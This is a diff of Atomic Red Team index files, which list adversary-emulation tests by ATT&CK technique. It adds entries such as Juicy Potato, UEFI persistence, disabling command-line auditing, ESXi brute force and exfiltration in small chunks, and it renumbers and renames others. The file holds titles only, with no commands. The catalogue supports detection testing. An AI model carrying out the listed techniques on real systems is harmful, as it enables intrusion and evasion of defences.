 - T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.001 Office Template Macros [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.001 Office Application Startup: Office Template Macros. [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1136.003 Create Account: Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1098 Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1137.003 Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -18,6 +18,7 @@
  - Atomic Test #11: Rundll32 with Ordinal Value [windows]
  - Atomic Test #12: Rundll32 with Control_RunDLL [windows]
  - Atomic Test #13: Rundll32 with desk.cpl [windows]
+  - Atomic Test #14: Running DLL with .init extension and function [windows]
 - T1027.009 Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1216.001 Signed Script Proxy Execution: Pubprn](../../T1216.001/T1216.001.md)
  - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
@@ -54,7 +55,8 @@
  - Atomic Test #24: Disable UAC - Switch to the secure desktop when prompting for elevation via registry key [windows]
  - Atomic Test #25: Disable UAC notification via registry keys [windows]
  - Atomic Test #26: Disable ConsentPromptBehaviorAdmin via registry keys [windows]
- T1542.001 System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1542.001 Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md)
+  - Atomic Test #1: UEFI Persistence via Wpbbin.exe File Creation [windows]
 - [T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
  - Atomic Test #1: Service Registry Permissions Weakness [windows]
  - Atomic Test #2: Service ImagePath Change with reg.exe [windows]
@@ -194,6 +196,7 @@
  - Atomic Test #20: LockBit Black - Unusual Windows firewall registry modification -cmd [windows]
  - Atomic Test #21: LockBit Black - Unusual Windows firewall registry modification -Powershell [windows]
  - Atomic Test #22: Blackbit - Disable Windows Firewall using netsh firewall [windows]
+  - Atomic Test #23: ESXi - Disable Firewall via Esxcli [windows]
 - [T1553.003 Subvert Trust Controls: SIP and Trust Provider Hijacking](../../T1553.003/T1553.003.md)
  - Atomic Test #1: SIP (Subject Interface Package) Hijacking via Custom DLL [windows]
 - T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -204,71 +207,72 @@
  - Atomic Test #1: Modify Registry of Current User Profile - cmd [windows]
  - Atomic Test #2: Modify Registry of Local Machine - cmd [windows]
  - Atomic Test #3: Modify registry to store logon credentials [windows]
-  - Atomic Test #4: Add domain to Trusted sites Zone [windows]
-  - Atomic Test #5: Javascript in registry [windows]
-  - Atomic Test #6: Change Powershell Execution Policy to Bypass [windows]
-  - Atomic Test #7: BlackByte Ransomware Registry Changes - CMD [windows]
-  - Atomic Test #8: BlackByte Ransomware Registry Changes - Powershell [windows]
-  - Atomic Test #9: Disable Windows Registry Tool [windows]
-  - Atomic Test #10: Disable Windows CMD application [windows]
-  - Atomic Test #11: Disable Windows Task Manager application [windows]
-  - Atomic Test #12: Disable Windows Notification Center [windows]
-  - Atomic Test #13: Disable Windows Shutdown Button [windows]
-  - Atomic Test #14: Disable Windows LogOff Button [windows]
-  - Atomic Test #15: Disable Windows Change Password Feature [windows]
-  - Atomic Test #16: Disable Windows Lock Workstation Feature [windows]
-  - Atomic Test #17: Activate Windows NoDesktop Group Policy Feature [windows]
-  - Atomic Test #18: Activate Windows NoRun Group Policy Feature [windows]
-  - Atomic Test #19: Activate Windows NoFind Group Policy Feature [windows]
-  - Atomic Test #20: Activate Windows NoControlPanel Group Policy Feature [windows]
-  - Atomic Test #21: Activate Windows NoFileMenu Group Policy Feature [windows]
-  - Atomic Test #22: Activate Windows NoClose Group Policy Feature [windows]
-  - Atomic Test #23: Activate Windows NoSetTaskbar Group Policy Feature [windows]
-  - Atomic Test #24: Activate Windows NoTrayContextMenu Group Policy Feature [windows]
-  - Atomic Test #25: Activate Windows NoPropertiesMyDocuments Group Policy Feature [windows]
-  - Atomic Test #26: Hide Windows Clock Group Policy Feature [windows]
-  - Atomic Test #27: Windows HideSCAHealth Group Policy Feature [windows]
-  - Atomic Test #28: Windows HideSCANetwork Group Policy Feature [windows]
-  - Atomic Test #29: Windows HideSCAPower Group Policy Feature [windows]
-  - Atomic Test #30: Windows HideSCAVolume Group Policy Feature [windows]
-  - Atomic Test #31: Windows Modify Show Compress Color And Info Tip Registry [windows]
-  - Atomic Test #32: Windows Powershell Logging Disabled [windows]
-  - Atomic Test #33: Windows Add Registry Value to Load Service in Safe Mode without Network [windows]
-  - Atomic Test #34: Windows Add Registry Value to Load Service in Safe Mode with Network [windows]
-  - Atomic Test #35: Disable Windows Toast Notifications [windows]
-  - Atomic Test #36: Disable Windows Security Center Notifications [windows]
-  - Atomic Test #37: Suppress Win Defender Notifications [windows]
-  - Atomic Test #38: Allow RDP Remote Assistance Feature [windows]
-  - Atomic Test #39: NetWire RAT Registry Key Creation [windows]
-  - Atomic Test #40: Ursnif Malware Registry Key Creation [windows]
-  - Atomic Test #41: Terminal Server Client Connection History Cleared [windows]
-  - Atomic Test #42: Disable Windows Error Reporting Settings [windows]
-  - Atomic Test #43: DisallowRun Execution Of Certain Applications [windows]
-  - Atomic Test #44: Enabling Restricted Admin Mode via Command_Prompt [windows]
-  - Atomic Test #45: Mimic Ransomware - Enable Multiple User Sessions [windows]
-  - Atomic Test #46: Mimic Ransomware - Allow Multiple RDP Sessions per User [windows]
-  - Atomic Test #47: Event Viewer Registry Modification - Redirection URL [windows]
-  - Atomic Test #48: Event Viewer Registry Modification - Redirection Program [windows]
-  - Atomic Test #49: Enabling Remote Desktop Protocol via Remote Registry [windows]
-  - Atomic Test #50: Disable Win Defender Notification [windows]
-  - Atomic Test #51: Disable Windows OS Auto Update [windows]
-  - Atomic Test #52: Disable Windows Auto Reboot for current logon user [windows]
-  - Atomic Test #53: Windows Auto Update Option to Notify before download [windows]
-  - Atomic Test #54: Do Not Connect To Win Update [windows]
-  - Atomic Test #55: Tamper Win Defender Protection [windows]
-  - Atomic Test #56: Snake Malware Registry Blob [windows]
-  - Atomic Test #57: Allow Simultaneous Download Registry [windows]
-  - Atomic Test #58: Modify Internet Zone Protocol Defaults in Current User Registry - cmd [windows]
-  - Atomic Test #59: Modify Internet Zone Protocol Defaults in Current User Registry - PowerShell [windows]
-  - Atomic Test #60: Activities To Disable Secondary Authentication Detected By Modified Registry Value. [windows]
-  - Atomic Test #61: Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value. [windows]
-  - Atomic Test #62: Scarab Ransomware Defense Evasion Activities [windows]
-  - Atomic Test #63: Disable Remote Desktop Anti-Alias Setting Through Registry [windows]
-  - Atomic Test #64: Disable Remote Desktop Security Settings Through Registry [windows]
-  - Atomic Test #65: Disabling ShowUI Settings of Windows Error Reporting (WER) [windows]
-  - Atomic Test #66: Enable Proxy Settings [windows]
-  - Atomic Test #67: Set-Up Proxy Server [windows]
-  - Atomic Test #68: RDP Authentication Level Override [windows]
+  - Atomic Test #4: Use Powershell to Modify registry to store logon credentials [windows]
+  - Atomic Test #5: Add domain to Trusted sites Zone [windows]
+  - Atomic Test #6: Javascript in registry [windows]
+  - Atomic Test #7: Change Powershell Execution Policy to Bypass [windows]
+  - Atomic Test #8: BlackByte Ransomware Registry Changes - CMD [windows]
+  - Atomic Test #9: BlackByte Ransomware Registry Changes - Powershell [windows]
+  - Atomic Test #10: Disable Windows Registry Tool [windows]
+  - Atomic Test #11: Disable Windows CMD application [windows]
+  - Atomic Test #12: Disable Windows Task Manager application [windows]
+  - Atomic Test #13: Disable Windows Notification Center [windows]
+  - Atomic Test #14: Disable Windows Shutdown Button [windows]
+  - Atomic Test #15: Disable Windows LogOff Button [windows]
+  - Atomic Test #16: Disable Windows Change Password Feature [windows]
+  - Atomic Test #17: Disable Windows Lock Workstation Feature [windows]
+  - Atomic Test #18: Activate Windows NoDesktop Group Policy Feature [windows]
+  - Atomic Test #19: Activate Windows NoRun Group Policy Feature [windows]
+  - Atomic Test #20: Activate Windows NoFind Group Policy Feature [windows]
+  - Atomic Test #21: Activate Windows NoControlPanel Group Policy Feature [windows]
+  - Atomic Test #22: Activate Windows NoFileMenu Group Policy Feature [windows]
+  - Atomic Test #23: Activate Windows NoClose Group Policy Feature [windows]
+  - Atomic Test #24: Activate Windows NoSetTaskbar Group Policy Feature [windows]
+  - Atomic Test #25: Activate Windows NoTrayContextMenu Group Policy Feature [windows]
+  - Atomic Test #26: Activate Windows NoPropertiesMyDocuments Group Policy Feature [windows]
+  - Atomic Test #27: Hide Windows Clock Group Policy Feature [windows]
+  - Atomic Test #28: Windows HideSCAHealth Group Policy Feature [windows]
+  - Atomic Test #29: Windows HideSCANetwork Group Policy Feature [windows]
+  - Atomic Test #30: Windows HideSCAPower Group Policy Feature [windows]
+  - Atomic Test #31: Windows HideSCAVolume Group Policy Feature [windows]
+  - Atomic Test #32: Windows Modify Show Compress Color And Info Tip Registry [windows]
+  - Atomic Test #33: Windows Powershell Logging Disabled [windows]
+  - Atomic Test #34: Windows Add Registry Value to Load Service in Safe Mode without Network [windows]
+  - Atomic Test #35: Windows Add Registry Value to Load Service in Safe Mode with Network [windows]
+  - Atomic Test #36: Disable Windows Toast Notifications [windows]
+  - Atomic Test #37: Disable Windows Security Center Notifications [windows]
+  - Atomic Test #38: Suppress Win Defender Notifications [windows]
+  - Atomic Test #39: Allow RDP Remote Assistance Feature [windows]
+  - Atomic Test #40: NetWire RAT Registry Key Creation [windows]
+  - Atomic Test #41: Ursnif Malware Registry Key Creation [windows]
+  - Atomic Test #42: Terminal Server Client Connection History Cleared [windows]
+  - Atomic Test #43: Disable Windows Error Reporting Settings [windows]
+  - Atomic Test #44: DisallowRun Execution Of Certain Applications [windows]
+  - Atomic Test #45: Enabling Restricted Admin Mode via Command_Prompt [windows]
+  - Atomic Test #46: Mimic Ransomware - Enable Multiple User Sessions [windows]
+  - Atomic Test #47: Mimic Ransomware - Allow Multiple RDP Sessions per User [windows]
+  - Atomic Test #48: Event Viewer Registry Modification - Redirection URL [windows]
+  - Atomic Test #49: Event Viewer Registry Modification - Redirection Program [windows]
+  - Atomic Test #50: Enabling Remote Desktop Protocol via Remote Registry [windows]
+  - Atomic Test #51: Disable Win Defender Notification [windows]
+  - Atomic Test #52: Disable Windows OS Auto Update [windows]
+  - Atomic Test #53: Disable Windows Auto Reboot for current logon user [windows]
+  - Atomic Test #54: Windows Auto Update Option to Notify before download [windows]
+  - Atomic Test #55: Do Not Connect To Win Update [windows]
+  - Atomic Test #56: Tamper Win Defender Protection [windows]
+  - Atomic Test #57: Snake Malware Registry Blob [windows]
+  - Atomic Test #58: Allow Simultaneous Download Registry [windows]
+  - Atomic Test #59: Modify Internet Zone Protocol Defaults in Current User Registry - cmd [windows]
+  - Atomic Test #60: Modify Internet Zone Protocol Defaults in Current User Registry - PowerShell [windows]
+  - Atomic Test #61: Activities To Disable Secondary Authentication Detected By Modified Registry Value. [windows]
+  - Atomic Test #62: Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value. [windows]
+  - Atomic Test #63: Scarab Ransomware Defense Evasion Activities [windows]
+  - Atomic Test #64: Disable Remote Desktop Anti-Alias Setting Through Registry [windows]
+  - Atomic Test #65: Disable Remote Desktop Security Settings Through Registry [windows]
+  - Atomic Test #66: Disabling ShowUI Settings of Windows Error Reporting (WER) [windows]
+  - Atomic Test #67: Enable Proxy Settings [windows]
+  - Atomic Test #68: Set-Up Proxy Server [windows]
+  - Atomic Test #69: RDP Authentication Level Override [windows]
 - [T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md)
  - Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
 - T1027.001 Obfuscated Files or Information: Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -342,12 +346,15 @@
  - Atomic Test #2: `SeDebugPrivilege` token duplication [windows]
  - Atomic Test #3: Launch NSudo Executable [windows]
  - Atomic Test #4: Bad Potato [windows]
+  - Atomic Test #5: Juicy Potato [windows]
 - T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.012 LNK Icon Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1564.002 Hide Artifacts: Hidden Users](../../T1564.002/T1564.002.md)
  - Atomic Test #3: Create Hidden User in Registry [windows]
 - T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.003 Impair Defenses: HISTCONTROL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1562.003 Impair Defenses: Impair Command History Logging](../../T1562.003/T1562.003.md)
+  - Atomic Test #11: Disable Windows Command Line Auditing using reg.exe [windows]
+  - Atomic Test #12: Disable Windows Command Line Auditing using Powershell Cmdlet [windows]
 - T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1134.004 Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md)
@@ -692,6 +699,7 @@
  - Atomic Test #2: `SeDebugPrivilege` token duplication [windows]
  - Atomic Test #3: Launch NSudo Executable [windows]
  - Atomic Test #4: Bad Potato [windows]
+  - Atomic Test #5: Juicy Potato [windows]
 - T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md)
  - Atomic Test #1: Persistence via WMI Event Subscription - CommandLineEventConsumer [windows]
@@ -848,7 +856,8 @@
  - Atomic Test #3: WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique [windows]
  - Atomic Test #4: WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique [windows]
  - Atomic Test #5: Run Shellcode via Syscall in Go [windows]
- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1059 Command and Scripting Interpreter](../../T1059/T1059.md)
+  - Atomic Test #1: AutoIt Script Execution [windows]
 - T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1072 Software Deployment Tools](../../T1072/T1072.md)
  - Atomic Test #1: Radmin Viewer Utility [windows]
@@ -926,7 +935,8 @@
 - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1133 External Remote Services](../../T1133/T1133.md)
  - Atomic Test #1: Running Chrome VPN Extensions via the Registry 2 vpn extension [windows]
- T1542.001 System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1542.001 Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md)
+  - Atomic Test #1: UEFI Persistence via Wpbbin.exe File Creation [windows]
 - [T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
  - Atomic Test #1: Service Registry Permissions Weakness [windows]
  - Atomic Test #2: Service ImagePath Change with reg.exe [windows]
@@ -1021,7 +1031,8 @@
  - Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows]
  - Atomic Test #3: Create a new Domain Account using PowerShell [windows]
 - T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.001 Office Template Macros [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1137.001 Office Application Startup: Office Template Macros.](../../T1137.001/T1137.001.md)
+  - Atomic Test #1: Injecting a Macro into the Word Normal.dotm Template for Persistence via PowerShell [windows]
 - [T1546.009 Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md)
  - Atomic Test #1: Create registry persistence via AppCert DLL [windows]
 - T1098.005 Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1143,7 +1154,8 @@
  - Atomic Test #4: DNS C2 [windows]
 - T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1568.001 Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071 Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1071 Application Layer Protocol](../../T1071/T1071.md)
+  - Atomic Test #1: Telnet C2 [windows]
 - [T1219 Remote Access Software](../../T1219/T1219.md)
  - Atomic Test #1: TeamViewer Files Detected Test on Windows [windows]
  - Atomic Test #2: AnyDesk Files Detected Test on Windows [windows]
@@ -1156,6 +1168,7 @@
  - Atomic Test #9: UltraViewer - RAT Execution [windows]
  - Atomic Test #10: UltraVNC Execution [windows]
  - Atomic Test #11: MSP360 Connect Execution [windows]
+  - Atomic Test #12: RustDesk Files Detected Test on Windows [windows]
 - T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1572 Protocol Tunneling](../../T1572/T1572.md)
@@ -1217,7 +1230,9 @@
  - Atomic Test #26: Download a file using wscript [windows]
  - Atomic Test #28: Nimgrab - Transfer Files [windows]
  - Atomic Test #29: iwr or Invoke Web-Request download [windows]
- T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1001.002 Data Obfuscation via Steganography](../../T1001.002/T1001.002.md)
+  - Atomic Test #1: Steganographic Tarball Embedding [windows]
+  - Atomic Test #2: Embedded Script in Image Execution via Extract-Invoke-PSImage [windows]
 - T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1090.001 Proxy: Internal Proxy](../../T1090.001/T1090.001.md)
  - Atomic Test #3: portproxy reg key [windows]
@@ -1230,6 +1245,7 @@
  - Atomic Test #2: Compress Data and lock with password for Exfiltration with winrar [windows]
  - Atomic Test #3: Compress Data and lock with password for Exfiltration with winzip [windows]
  - Atomic Test #4: Compress Data and lock with password for Exfiltration with 7zip [windows]
+  - Atomic Test #10: ESXi - Remove Syslog remote IP [windows]
 - [T1113 Screen Capture](../../T1113/T1113.md)
  - Atomic Test #7: Windows Screencapture [windows]
  - Atomic Test #8: Windows Screen Capture (CopyFromScreen) [windows]
@@ -1335,6 +1351,7 @@
  - Atomic Test #1: Brute Force Credentials of single Active Directory domain users via SMB [windows]
  - Atomic Test #2: Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos) [windows]
  - Atomic Test #4: Password Brute User using Kerbrute Tool [windows]
+  - Atomic Test #8: ESXi - Brute Force Until Account Lockout [windows]
 - [T1003 OS Credential Dumping](../../T1003/T1003.md)
  - Atomic Test #1: Gsecdump [windows]
  - Atomic Test #2: Credential Dumping with NPPSpy [windows]
@@ -1487,6 +1504,7 @@
  - Atomic Test #6: Create Volume Shadow Copy remotely (WMI) with esentutl [windows]
  - Atomic Test #7: Create Volume Shadow Copy with Powershell [windows]
  - Atomic Test #8: Create Symlink to Volume Shadow Copy [windows]
+  - Atomic Test #9: Create Volume Shadow Copy with diskshadow [windows]
 - [T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting](../../T1558.003/T1558.003.md)
  - Atomic Test #1: Request for service tickets [windows]
  - Atomic Test #2: Rubeus kerberoast [windows]
@@ -1584,6 +1602,7 @@
 - [T1120 Peripheral Device Discovery](../../T1120/T1120.md)
  - Atomic Test #1: Win32_PnPEntity Hardware Inventory [windows]
  - Atomic Test #2: WinPwn - printercheck [windows]
+  - Atomic Test #3: Peripheral Device Discovery via fsutil [windows]
 - [T1082 System Information Discovery](../../T1082/T1082.md)
  - Atomic Test #1: System Information Discovery [windows]
  - Atomic Test #7: Hostname Discovery (Windows) [windows]
@@ -1645,6 +1664,7 @@
 - T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1654 Log Enumeration](../../T1654/T1654.md)
  - Atomic Test #1: Get-EventLog To Enumerate Windows Security Log [windows]
+  - Atomic Test #2: Enumerate Windows Security Log via WevtUtil [windows]
 - [T1057 Process Discovery](../../T1057/T1057.md)
  - Atomic Test #2: Process Discovery - tasklist [windows]
  - Atomic Test #3: Process Discovery - Get-Process [windows]
@@ -1828,7 +1848,8 @@
  - Atomic Test #1: Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows) [windows]
 - [T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md)
  - Atomic Test #1: Exfiltrate data with rclone to cloud Storage - Mega (Windows) [windows]
- T1030 Data Transfer Size Limits [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1030 Data Transfer Size Limits](../../T1030/T1030.md)
+  - Atomic Test #2: Network-Based Data Transfer in Small Chunks [windows]
 - T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md)
  - Atomic Test #2: Exfiltration Over Alternative Protocol - ICMP [windows]
@@ -36,7 +36,7 @@
 |  |  | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) |  |
 |  |  | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  | [Ingress Tool Transfer](../../T1105/T1105.md) |  |
-|  |  | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) |  | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
+|  |  | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) |  | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  | Data Obfuscation via Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | [Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md) |  | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) |  |  |  |  |  | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md) |  |  |  |  |  | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) |  |
 |  |  | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
@@ -49,7 +49,7 @@
 |  |  |  |  | Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Hide Artifacts: Hidden Users [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  |  |  | [Impair Defenses: HISTCONTROL](../../T1562.003/T1562.003.md) |  |  |  |  |  |  |  |
+|  |  |  |  | [Impair Defenses: Impair Command History Logging](../../T1562.003/T1562.003.md) |  |  |  |  |  |  |  |
 |  |  |  |  | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | [Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md) |  |  |  |  |  |  |  |
@@ -36,7 +36,7 @@
 |  |  | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md) | [Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery](../../T1518/T1518.md) |  |  |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) |  |
 |  |  | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) |  |  |  |  |  | [Ingress Tool Transfer](../../T1105/T1105.md) |  |
-|  |  | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
+|  |  | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  | Data Obfuscation via Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | [Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md) |  | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
